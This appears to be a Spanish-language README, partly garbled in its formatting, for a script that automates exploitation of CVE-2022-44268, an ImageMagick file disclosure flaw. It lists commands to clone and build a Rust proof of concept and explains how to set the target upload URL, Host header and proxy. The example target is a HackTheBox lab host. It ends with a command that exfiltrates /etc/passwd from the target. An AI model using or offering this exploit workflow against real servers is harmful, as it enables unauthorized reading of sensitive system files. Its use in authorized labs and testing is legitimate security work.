
Un script de automatización de exploits que se basa en el trabajo de Voidzone security.
Este script automatiza la explotación de CVE-2022-44268 (divulgación de archivos de ImageMagick).
image.png).exiftool para extraer e imprimir el contenido del archivo exfiltrado.requests de Python: pip install requestshttps://git.rotfl.io/v/CVE-2022-44268.gitcargo build en su directorio.exiftool.wget.git clone https://git.rotfl.io/v/CVE-2022-44268.gitcd CVE-2022-44268cargo buildautomate_exploit.py) DENTRO del directorio CVE-2022-44268.DEBES editar el script de Python (automate_exploit.py) para tu objetivo. Variables clave a cambiar:
payload: Ruta al image.png malicioso generado por el PoC en Rust.
"/home/kali/usr/htb/pilgrimage/CVE-2022-44268/image.png""image.png" (ya que el script se ejecuta donde se crea image.png).url: La URL objetivo para la subida de imágenes.
"http://pilgrimage.htb""http://vulnerable-site.com/upload").proxies (opcional): Para enrutar el tráfico (p. ej., a través de Burp Suite).
{'http': 'http://127.0.0.1:8080'}None si no es necesario.Cabecera Host (dentro del diccionario headers): Debe coincidir con el nombre de host en tu url.
'Host': 'pilgrimage.htb'Asegúrate de estar en el directorio CVE-2022-44268 (donde se encuentran automate_exploit.py y el PoC en Rust).
Ejecuta el script, proporcionando la ruta del archivo objetivo a exfiltrar como argumento:
python3 automate_exploit.py "/etc/passwd"